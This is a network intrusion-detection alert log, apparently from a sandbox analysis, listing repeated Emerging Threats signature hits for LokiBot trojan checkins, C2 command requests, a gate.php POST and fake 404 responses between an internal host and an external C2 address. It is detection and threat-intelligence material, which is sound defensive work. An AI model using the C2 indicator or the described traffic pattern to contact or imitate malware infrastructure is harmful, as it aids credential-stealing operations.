                                    12/03/20-10:02:54.121373TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.347.91.79.163
                                    12/03/20-10:02:54.121373TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.347.91.79.163
                                    12/03/20-10:02:54.121373TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979080192.168.2.347.91.79.163
                                    12/03/20-10:02:54.179342TCP2025483ET TROJAN LokiBot Fake 404 Response804979047.91.79.163192.168.2.3
                                    12/03/20-10:02:54.407060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.347.91.79.163
                                    12/03/20-10:02:54.407060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.347.91.79.163
                                    12/03/20-10:02:54.407060TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.347.91.79.163
                                    12/03/20-10:02:54.407060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.347.91.79.163
                                    12/03/20-10:02:54.407060TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979180192.168.2.347.91.79.163
                                    12/03/20-10:02:54.467419TCP2025483ET TROJAN LokiBot Fake 404 Response804979147.91.79.163192.168.2.3
                                    12/03/20-10:02:55.055545TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.347.91.79.163
                                    12/03/20-10:02:55.055545TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.347.91.79.163
                                    12/03/20-10:02:55.055545TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.347.91.79.163
                                    12/03/20-10:02:55.055545TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.347.91.79.163
                                    12/03/20-10:02:55.055545TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979280192.168.2.347.91.79.163
                                    12/03/20-10:02:55.114170TCP2025483ET TROJAN LokiBot Fake 404 Response804979247.91.79.163192.168.2.3
                                    12/03/20-10:02:55.316098TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.347.91.79.163
                                    12/03/20-10:02:55.316098TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.347.91.79.163
                                    12/03/20-10:02:55.316098TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.347.91.79.163
                                    12/03/20-10:02:55.316098TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.347.91.79.163
                                    12/03/20-10:02:55.316098TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979380192.168.2.347.91.79.163
                                    12/03/20-10:02:55.375068TCP2025483ET TROJAN LokiBot Fake 404 Response804979347.91.79.163192.168.2.3
                                    12/03/20-10:02:56.857683TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.347.91.79.163
                                    12/03/20-10:02:56.857683TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.347.91.79.163
                                    12/03/20-10:02:56.857683TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.347.91.79.163
                                    12/03/20-10:02:56.857683TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.347.91.79.163
                                    12/03/20-10:02:56.857683TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979480192.168.2.347.91.79.163
                                    12/03/20-10:02:56.919630TCP2025483ET TROJAN LokiBot Fake 404 Response804979447.91.79.163192.168.2.3
                                    12/03/20-10:02:57.187963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.347.91.79.163
                                    12/03/20-10:02:57.187963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.347.91.79.163
                                    12/03/20-10:02:57.187963TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.347.91.79.163
                                    12/03/20-10:02:57.187963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.347.91.79.163
                                    12/03/20-10:02:57.187963TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979580192.168.2.347.91.79.163
                                    12/03/20-10:02:57.247362TCP2025483ET TROJAN LokiBot Fake 404 Response804979547.91.79.163192.168.2.3
                                    12/03/20-10:02:57.510316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.347.91.79.163
                                    12/03/20-10:02:57.510316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.347.91.79.163
                                    12/03/20-10:02:57.510316TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.347.91.79.163
                                    12/03/20-10:02:57.510316TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.347.91.79.163
                                    12/03/20-10:02:57.510316TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979680192.168.2.347.91.79.163
                                    12/03/20-10:02:57.671838TCP2025483ET TROJAN LokiBot Fake 404 Response804979647.91.79.163192.168.2.3
                                    12/03/20-10:02:57.913059TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.347.91.79.163
                                    12/03/20-10:02:57.913059TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.347.91.79.163
                                    12/03/20-10:02:57.913059TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.347.91.79.163
                                    12/03/20-10:02:57.913059TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.347.91.79.163
                                    12/03/20-10:02:57.913059TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979780192.168.2.347.91.79.163
                                    12/03/20-10:02:57.976096TCP2025483ET TROJAN LokiBot Fake 404 Response804979747.91.79.163192.168.2.3
                                    12/03/20-10:02:58.226168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.347.91.79.163
                                    12/03/20-10:02:58.226168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.347.91.79.163
                                    12/03/20-10:02:58.226168TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.347.91.79.163
                                    12/03/20-10:02:58.226168TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.347.91.79.163
                                    12/03/20-10:02:58.226168TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979880192.168.2.347.91.79.163
                                    12/03/20-10:02:58.284836TCP2025483ET TROJAN LokiBot Fake 404 Response804979847.91.79.163192.168.2.3
                                    12/03/20-10:02:58.533427TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.347.91.79.163
                                    12/03/20-10:02:58.533427TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.347.91.79.163
                                    12/03/20-10:02:58.533427TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.347.91.79.163
                                    12/03/20-10:02:58.533427TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.347.91.79.163
                                    12/03/20-10:02:58.533427TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979980192.168.2.347.91.79.163
                                    12/03/20-10:02:58.594890TCP2025483ET TROJAN LokiBot Fake 404 Response804979947.91.79.163192.168.2.3
                                    12/03/20-10:02:58.817428TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.347.91.79.163
                                    12/03/20-10:02:58.817428TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.347.91.79.163
                                    12/03/20-10:02:58.817428TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.347.91.79.163
                                    12/03/20-10:02:58.817428TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.347.91.79.163
                                    12/03/20-10:02:58.817428TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980080192.168.2.347.91.79.163
                                    12/03/20-10:02:58.876024TCP2025483ET TROJAN LokiBot Fake 404 Response804980047.91.79.163192.168.2.3
                                    12/03/20-10:02:59.111866TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.347.91.79.163
                                    12/03/20-10:02:59.111866TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.347.91.79.163
                                    12/03/20-10:02:59.111866TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.347.91.79.163
                                    12/03/20-10:02:59.111866TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.2.347.91.79.163
                                    12/03/20-10:02:59.111866TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980180192.168.2.347.91.79.163
                                    12/03/20-10:02:59.170836TCP2025483ET TROJAN LokiBot Fake 404 Response804980147.91.79.163192.168.2.3
                                    12/03/20-10:02:59.381632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.347.91.79.163
                                    12/03/20-10:02:59.381632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.347.91.79.163
                                    12/03/20-10:02:59.381632TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.347.91.79.163
                                    12/03/20-10:02:59.381632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.347.91.79.163
                                    12/03/20-10:02:59.381632TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980280192.168.2.347.91.79.163
                                    12/03/20-10:02:59.445429TCP2025483ET TROJAN LokiBot Fake 404 Response804980247.91.79.163192.168.2.3
                                    12/03/20-10:02:59.677287TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.347.91.79.163
                                    12/03/20-10:02:59.677287TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.347.91.79.163
                                    12/03/20-10:02:59.677287TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.347.91.79.163
                                    12/03/20-10:02:59.677287TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.347.91.79.163
                                    12/03/20-10:02:59.677287TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980580192.168.2.347.91.79.163
                                    12/03/20-10:02:59.735946TCP2025483ET TROJAN LokiBot Fake 404 Response804980547.91.79.163192.168.2.3
                                    12/03/20-10:02:59.972610TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.347.91.79.163
                                    12/03/20-10:02:59.972610TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.347.91.79.163
                                    12/03/20-10:02:59.972610TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.347.91.79.163
                                    12/03/20-10:02:59.972610TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.347.91.79.163
                                    12/03/20-10:02:59.972610TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980680192.168.2.347.91.79.163
                                    12/03/20-10:03:00.035091TCP2025483ET TROJAN LokiBot Fake 404 Response804980647.91.79.163192.168.2.3
                                    12/03/20-10:03:00.268385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.347.91.79.163
                                    12/03/20-10:03:00.268385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.347.91.79.163
                                    12/03/20-10:03:00.268385TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.347.91.79.163
                                    12/03/20-10:03:00.268385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.347.91.79.163
                                    12/03/20-10:03:00.268385TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980780192.168.2.347.91.79.163
                                    12/03/20-10:03:00.328425TCP2025483ET TROJAN LokiBot Fake 404 Response804980747.91.79.163192.168.2.3
                                    12/03/20-10:03:01.603999TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.347.91.79.163
                                    12/03/20-10:03:01.603999TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.347.91.79.163
                                    12/03/20-10:03:01.603999TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.347.91.79.163
                                    12/03/20-10:03:01.603999TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.347.91.79.163
                                    12/03/20-10:03:01.603999TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980880192.168.2.347.91.79.163
                                    12/03/20-10:03:01.806380TCP2025483ET TROJAN LokiBot Fake 404 Response804980847.91.79.163192.168.2.3
                                    12/03/20-10:03:02.010652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.347.91.79.163
                                    12/03/20-10:03:02.010652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.347.91.79.163
                                    12/03/20-10:03:02.010652TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.347.91.79.163
                                    12/03/20-10:03:02.010652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.347.91.79.163
                                    12/03/20-10:03:02.010652TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980980192.168.2.347.91.79.163
                                    12/03/20-10:03:02.067979TCP2025483ET TROJAN LokiBot Fake 404 Response804980947.91.79.163192.168.2.3
                                    12/03/20-10:03:02.313843TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.347.91.79.163
                                    12/03/20-10:03:02.313843TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.347.91.79.163
                                    12/03/20-10:03:02.313843TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.347.91.79.163
                                    12/03/20-10:03:02.313843TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.347.91.79.163
                                    12/03/20-10:03:02.313843TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981080192.168.2.347.91.79.163
                                    12/03/20-10:03:02.375624TCP2025483ET TROJAN LokiBot Fake 404 Response804981047.91.79.163192.168.2.3
                                    12/03/20-10:03:02.613556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.347.91.79.163
                                    12/03/20-10:03:02.613556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.347.91.79.163
                                    12/03/20-10:03:02.613556TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.347.91.79.163
                                    12/03/20-10:03:02.613556TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.347.91.79.163
                                    12/03/20-10:03:02.613556TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981180192.168.2.347.91.79.163
                                    12/03/20-10:03:02.672328TCP2025483ET TROJAN LokiBot Fake 404 Response804981147.91.79.163192.168.2.3
                                    12/03/20-10:03:02.888199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.347.91.79.163
                                    12/03/20-10:03:02.888199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.347.91.79.163
                                    12/03/20-10:03:02.888199TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.347.91.79.163
                                    12/03/20-10:03:02.888199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.347.91.79.163
                                    12/03/20-10:03:02.888199TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981280192.168.2.347.91.79.163
                                    12/03/20-10:03:02.951845TCP2025483ET TROJAN LokiBot Fake 404 Response804981247.91.79.163192.168.2.3
                                    12/03/20-10:03:03.157768TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.347.91.79.163
                                    12/03/20-10:03:03.157768TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.347.91.79.163
                                    12/03/20-10:03:03.157768TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.347.91.79.163
                                    12/03/20-10:03:03.157768TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.347.91.79.163
                                    12/03/20-10:03:03.157768TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981380192.168.2.347.91.79.163
                                    12/03/20-10:03:03.217158TCP2025483ET TROJAN LokiBot Fake 404 Response804981347.91.79.163192.168.2.3
                                    12/03/20-10:03:03.503054TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.347.91.79.163
                                    12/03/20-10:03:03.503054TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.347.91.79.163
                                    12/03/20-10:03:03.503054TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.347.91.79.163
                                    12/03/20-10:03:03.503054TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.347.91.79.163
                                    12/03/20-10:03:03.503054TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981480192.168.2.347.91.79.163
                                    12/03/20-10:03:03.562713TCP2025483ET TROJAN LokiBot Fake 404 Response804981447.91.79.163192.168.2.3
                                    12/03/20-10:03:03.856348TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.347.91.79.163
                                    12/03/20-10:03:03.856348TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.347.91.79.163
                                    12/03/20-10:03:03.856348TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.347.91.79.163
                                    12/03/20-10:03:03.856348TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.2.347.91.79.163
                                    12/03/20-10:03:03.856348TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981580192.168.2.347.91.79.163
                                    12/03/20-10:03:03.913267TCP2025483ET TROJAN LokiBot Fake 404 Response804981547.91.79.163192.168.2.3
                                    12/03/20-10:03:04.112260TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.347.91.79.163
                                    12/03/20-10:03:04.112260TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.347.91.79.163
                                    12/03/20-10:03:04.112260TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.347.91.79.163
                                    12/03/20-10:03:04.112260TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.347.91.79.163
                                    12/03/20-10:03:04.112260TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981680192.168.2.347.91.79.163
                                    12/03/20-10:03:04.173198TCP2025483ET TROJAN LokiBot Fake 404 Response804981647.91.79.163192.168.2.3
                                    12/03/20-10:03:04.389681TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.347.91.79.163
                                    12/03/20-10:03:04.389681TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.347.91.79.163
                                    12/03/20-10:03:04.389681TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.347.91.79.163
                                    12/03/20-10:03:04.389681TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.347.91.79.163
                                    12/03/20-10:03:04.389681TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981780192.168.2.347.91.79.163
                                    12/03/20-10:03:04.451117TCP2025483ET TROJAN LokiBot Fake 404 Response804981747.91.79.163192.168.2.3
                                    12/03/20-10:03:04.904413TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.347.91.79.163
                                    12/03/20-10:03:04.904413TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.347.91.79.163
                                    12/03/20-10:03:04.904413TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.347.91.79.163
                                    12/03/20-10:03:04.904413TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.347.91.79.163
                                    12/03/20-10:03:04.904413TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981880192.168.2.347.91.79.163
                                    12/03/20-10:03:04.964256TCP2025483ET TROJAN LokiBot Fake 404 Response804981847.91.79.163192.168.2.3
                                    12/03/20-10:03:05.283815TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.347.91.79.163
                                    12/03/20-10:03:05.283815TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.347.91.79.163
                                    12/03/20-10:03:05.283815TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.347.91.79.163
                                    12/03/20-10:03:05.283815TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.347.91.79.163
                                    12/03/20-10:03:05.283815TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981980192.168.2.347.91.79.163
                                    12/03/20-10:03:05.344181TCP2025483ET TROJAN LokiBot Fake 404 Response804981947.91.79.163192.168.2.3
                                    12/03/20-10:03:05.585961TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.347.91.79.163
                                    12/03/20-10:03:05.585961TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.347.91.79.163
                                    12/03/20-10:03:05.585961TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.347.91.79.163
                                    12/03/20-10:03:05.585961TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.347.91.79.163
                                    12/03/20-10:03:05.585961TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982080192.168.2.347.91.79.163
                                    12/03/20-10:03:05.649937TCP2025483ET TROJAN LokiBot Fake 404 Response804982047.91.79.163192.168.2.3
                                    12/03/20-10:03:06.054062TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.347.91.79.163
                                    12/03/20-10:03:06.054062TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.347.91.79.163
                                    12/03/20-10:03:06.054062TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.347.91.79.163
                                    12/03/20-10:03:06.054062TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.347.91.79.163
                                    12/03/20-10:03:06.054062TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982180192.168.2.347.91.79.163
                                    12/03/20-10:03:06.116900TCP2025483ET TROJAN LokiBot Fake 404 Response804982147.91.79.163192.168.2.3
                                    12/03/20-10:03:06.321848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.347.91.79.163
                                    12/03/20-10:03:06.321848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.347.91.79.163
                                    12/03/20-10:03:06.321848TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.347.91.79.163
                                    12/03/20-10:03:06.321848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.347.91.79.163
                                    12/03/20-10:03:06.321848TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982280192.168.2.347.91.79.163
                                    12/03/20-10:03:06.384400TCP2025483ET TROJAN LokiBot Fake 404 Response804982247.91.79.163192.168.2.3
                                    12/03/20-10:03:06.983532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.347.91.79.163
                                    12/03/20-10:03:06.983532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.347.91.79.163
                                    12/03/20-10:03:06.983532TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.347.91.79.163
                                    12/03/20-10:03:06.983532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.347.91.79.163
                                    12/03/20-10:03:06.983532TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982380192.168.2.347.91.79.163
                                    12/03/20-10:03:07.036550TCP2025483ET TROJAN LokiBot Fake 404 Response804982347.91.79.163192.168.2.3
                                    12/03/20-10:03:07.247568TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.347.91.79.163
                                    12/03/20-10:03:07.247568TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.347.91.79.163
                                    12/03/20-10:03:07.247568TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.347.91.79.163
                                    12/03/20-10:03:07.247568TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.347.91.79.163
                                    12/03/20-10:03:07.247568TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982580192.168.2.347.91.79.163
                                    12/03/20-10:03:07.307061TCP2025483ET TROJAN LokiBot Fake 404 Response804982547.91.79.163192.168.2.3
                                    12/03/20-10:03:07.514056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.347.91.79.163
                                    12/03/20-10:03:07.514056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.347.91.79.163
                                    12/03/20-10:03:07.514056TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.347.91.79.163
                                    12/03/20-10:03:07.514056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.2.347.91.79.163
                                    12/03/20-10:03:07.514056TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982680192.168.2.347.91.79.163
                                    12/03/20-10:03:07.577130TCP2025483ET TROJAN LokiBot Fake 404 Response804982647.91.79.163192.168.2.3
                                    12/03/20-10:03:07.815653TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.347.91.79.163
                                    12/03/20-10:03:07.815653TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.347.91.79.163
                                    12/03/20-10:03:07.815653TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.347.91.79.163
                                    12/03/20-10:03:07.815653TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.2.347.91.79.163
                                    12/03/20-10:03:07.815653TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982880192.168.2.347.91.79.163
                                    12/03/20-10:03:07.908293TCP2025483ET TROJAN LokiBot Fake 404 Response804982847.91.79.163192.168.2.3
                                    12/03/20-10:03:08.117953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.347.91.79.163
                                    12/03/20-10:03:08.117953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.347.91.79.163
                                    12/03/20-10:03:08.117953TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.347.91.79.163
                                    12/03/20-10:03:08.117953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.2.347.91.79.163
                                    12/03/20-10:03:08.117953TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4983080192.168.2.347.91.79.163
                                    12/03/20-10:03:08.178644TCP2025483ET TROJAN LokiBot Fake 404 Response804983047.91.79.163192.168.2.3
                                    12/03/20-10:03:08.390972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.347.91.79.163
                                    12/03/20-10:03:08.390972TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.347.91.79.163
                                    12/03/20-10:03:08.390972TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.347.91.79.163
                                    12/03/20-10:03:08.390972TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.2.347.91.79.163
                                    12/03/20-10:03:08.390972TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4983280192.168.2.347.91.79.163
                                    12/03/20-10:03:08.453232TCP2025483ET TROJAN LokiBot Fake 404 Response804983247.91.79.163192.168.2.3
                                    12/03/20-10:03:08.688532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.347.91.79.163
                                    12/03/20-10:03:08.688532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.347.91.79.163
                                    12/03/20-10:03:08.688532TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.347.91.79.163
                                    12/03/20-10:03:08.688532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.2.347.91.79.163
                                    12/03/20-10:03:08.688532TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4983480192.168.2.347.91.79.163
                                    12/03/20-10:03:08.751399TCP2025483ET TROJAN LokiBot Fake 404 Response804983447.91.79.163192.168.2.3
                                    12/03/20-10:03:08.977336TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983680192.168.2.347.91.79.163
                                    12/03/20-10:03:08.977336TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983680192.168.2.347.91.79.163
                                    12/03/20-10:03:08.977336TCP2025381ET TROJAN LokiBot Checkin4983680192.168.2.347.91.79.163
                                    12/03/20-10:03:08.977336TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983680192.168.2.347.91.79.163
                                    12/03/20-10:03:08.977336TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4983680192.168.2.347.91.79.163
                                    12/03/20-10:03:09.036973TCP2025483ET TROJAN LokiBot Fake 404 Response804983647.91.79.163192.168.2.3
                                    12/03/20-10:03:09.259970TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.347.91.79.163
                                    12/03/20-10:03:09.259970TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.347.91.79.163
                                    12/03/20-10:03:09.259970TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.347.91.79.163
                                    12/03/20-10:03:09.259970TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.2.347.91.79.163
                                    12/03/20-10:03:09.259970TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4983880192.168.2.347.91.79.163
